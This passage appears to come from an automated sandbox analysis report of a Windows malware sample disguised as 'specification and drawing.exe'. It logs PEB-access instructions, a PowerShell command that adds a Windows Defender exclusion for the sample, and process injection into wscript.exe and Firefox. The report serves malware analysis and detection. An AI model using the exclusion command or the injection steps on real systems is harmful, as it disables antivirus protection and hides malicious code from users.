                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C810 mov eax, dword ptr fs:[00000030h]4_2_0114C810
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116483A mov eax, dword ptr fs:[00000030h]4_2_0116483A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116483A mov eax, dword ptr fs:[00000030h]4_2_0116483A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov ecx, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA830 mov eax, dword ptr fs:[00000030h]4_2_010FA830
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D2840 mov ecx, dword ptr fs:[00000030h]4_2_010D2840
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4859 mov eax, dword ptr fs:[00000030h]4_2_010C4859
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4859 mov eax, dword ptr fs:[00000030h]4_2_010C4859
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0854 mov eax, dword ptr fs:[00000030h]4_2_010F0854
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156870 mov eax, dword ptr fs:[00000030h]4_2_01156870
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156870 mov eax, dword ptr fs:[00000030h]4_2_01156870
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E872 mov eax, dword ptr fs:[00000030h]4_2_0114E872
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E872 mov eax, dword ptr fs:[00000030h]4_2_0114E872
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C89D mov eax, dword ptr fs:[00000030h]4_2_0114C89D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0887 mov eax, dword ptr fs:[00000030h]4_2_010C0887
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE8C0 mov eax, dword ptr fs:[00000030h]4_2_010EE8C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC8F9 mov eax, dword ptr fs:[00000030h]4_2_010FC8F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC8F9 mov eax, dword ptr fs:[00000030h]4_2_010FC8F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A8E4 mov eax, dword ptr fs:[00000030h]4_2_0118A8E4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEB20 mov eax, dword ptr fs:[00000030h]4_2_010EEB20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEB20 mov eax, dword ptr fs:[00000030h]4_2_010EEB20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188B28 mov eax, dword ptr fs:[00000030h]4_2_01188B28
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188B28 mov eax, dword ptr fs:[00000030h]4_2_01188B28
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01168B42 mov eax, dword ptr fs:[00000030h]4_2_01168B42
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156B40 mov eax, dword ptr fs:[00000030h]4_2_01156B40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156B40 mov eax, dword ptr fs:[00000030h]4_2_01156B40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118AB40 mov eax, dword ptr fs:[00000030h]4_2_0118AB40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BCB7E mov eax, dword ptr fs:[00000030h]4_2_010BCB7E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0BBE mov eax, dword ptr fs:[00000030h]4_2_010D0BBE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0BBE mov eax, dword ptr fs:[00000030h]4_2_010D0BBE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116EBD0 mov eax, dword ptr fs:[00000030h]4_2_0116EBD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114CBF0 mov eax, dword ptr fs:[00000030h]4_2_0114CBF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEBFC mov eax, dword ptr fs:[00000030h]4_2_010EEBFC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114CA11 mov eax, dword ptr fs:[00000030h]4_2_0114CA11
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEA2E mov eax, dword ptr fs:[00000030h]4_2_010EEA2E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA24 mov eax, dword ptr fs:[00000030h]4_2_010FCA24
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA38 mov eax, dword ptr fs:[00000030h]4_2_010FCA38
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E4A35 mov eax, dword ptr fs:[00000030h]4_2_010E4A35
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E4A35 mov eax, dword ptr fs:[00000030h]4_2_010E4A35
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0A5B mov eax, dword ptr fs:[00000030h]4_2_010D0A5B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0A5B mov eax, dword ptr fs:[00000030h]4_2_010D0A5B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C6A50 mov eax, dword ptr fs:[00000030h]4_2_010C6A50
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA6F mov eax, dword ptr fs:[00000030h]4_2_010FCA6F
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113CA72 mov eax, dword ptr fs:[00000030h]4_2_0113CA72
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113CA72 mov eax, dword ptr fs:[00000030h]4_2_0113CA72
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CEA80 mov eax, dword ptr fs:[00000030h]4_2_010CEA80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194A80 mov eax, dword ptr fs:[00000030h]4_2_01194A80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8A90 mov edx, dword ptr fs:[00000030h]4_2_010F8A90
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8AA0 mov eax, dword ptr fs:[00000030h]4_2_010C8AA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8AA0 mov eax, dword ptr fs:[00000030h]4_2_010C8AA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116AA4 mov eax, dword ptr fs:[00000030h]4_2_01116AA4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0AD0 mov eax, dword ptr fs:[00000030h]4_2_010C0AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01116ACC mov eax, dword ptr fs:[00000030h]4_2_01116ACC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4AD0 mov eax, dword ptr fs:[00000030h]4_2_010F4AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4AD0 mov eax, dword ptr fs:[00000030h]4_2_010F4AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FAAEE mov eax, dword ptr fs:[00000030h]4_2_010FAAEE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FAAEE mov eax, dword ptr fs:[00000030h]4_2_010FAAEE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01178D10 mov eax, dword ptr fs:[00000030h]4_2_01178D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01178D10 mov eax, dword ptr fs:[00000030h]4_2_01178D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DAD00 mov eax, dword ptr fs:[00000030h]4_2_010DAD00
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F4D1D mov eax, dword ptr fs:[00000030h]4_2_010F4D1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B6D10 mov eax, dword ptr fs:[00000030h]4_2_010B6D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01148D20 mov eax, dword ptr fs:[00000030h]4_2_01148D20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8D59 mov eax, dword ptr fs:[00000030h]4_2_010C8D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0D59 mov eax, dword ptr fs:[00000030h]4_2_010C0D59
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01158D6B mov eax, dword ptr fs:[00000030h]4_2_01158D6B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F6DA0 mov eax, dword ptr fs:[00000030h]4_2_010F6DA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E8DBF mov eax, dword ptr fs:[00000030h]4_2_010E8DBF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E8DBF mov eax, dword ptr fs:[00000030h]4_2_010E8DBF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01194DAD mov eax, dword ptr fs:[00000030h]4_2_01194DAD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188DAE mov eax, dword ptr fs:[00000030h]4_2_01188DAE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188DAE mov eax, dword ptr fs:[00000030h]4_2_01188DAE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov ecx, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov eax, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCDB1 mov eax, dword ptr fs:[00000030h]4_2_010FCDB1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144DD7 mov eax, dword ptr fs:[00000030h]4_2_01144DD7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144DD7 mov eax, dword ptr fs:[00000030h]4_2_01144DD7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEDD3 mov eax, dword ptr fs:[00000030h]4_2_010EEDD3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEDD3 mov eax, dword ptr fs:[00000030h]4_2_010EEDD3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BCDEA mov eax, dword ptr fs:[00000030h]4_2_010BCDEA
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BCDEA mov eax, dword ptr fs:[00000030h]4_2_010BCDEA
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01160DF0 mov eax, dword ptr fs:[00000030h]4_2_01160DF0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtClose: Direct from: 0x77382B6C
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                      Source: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory written: C:\Users\user\Desktop\specification and drawing.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 4852Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeThread APC queued: target process: C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exeJump to behavior
